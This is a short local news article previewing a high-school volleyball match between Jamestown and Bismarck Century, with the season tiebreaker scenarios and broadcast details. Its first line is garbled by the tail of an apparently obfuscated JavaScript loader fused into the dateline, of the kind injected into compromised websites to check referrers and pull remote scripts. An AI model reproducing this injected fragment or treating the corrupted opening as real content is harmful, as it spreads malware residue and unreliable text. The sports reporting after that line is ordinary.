JAMESTOWN ahszs|var|u0026u|referrer|eybze||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Its possibly the biggest volleyball match in the history of Jamestown High as they head to Bismarck Century tonight with the West Region regular-season title on the line.

A win for the Jays will lock-up the No. 1 spot in the WDA Tournament, which will be held in Jamestown November 14, 15, and 16. Jamestown defeated Century in five sets back in September (25-17, 25-22, 21-25, 22-25, 15-10).

In event of a Jamestown loss, there will be several tie breakers to consider, but neither team will have the West locked up due to the matches left to be played.

If Century wins in four, they will control the right to the No. 1-seed due to the second tiebreaker which is sets won against the opponent in question. If Century wins in five, things will get a little more tricky and we will be down to the third tiebreaker.

The third tiebreaker is point spread, which Jamestown currently leads 108-99.

The game tonight will be broadcast on 1400/97.1 KQDJ and online at NewsDakota.com starting a little after 7pm from Century High.
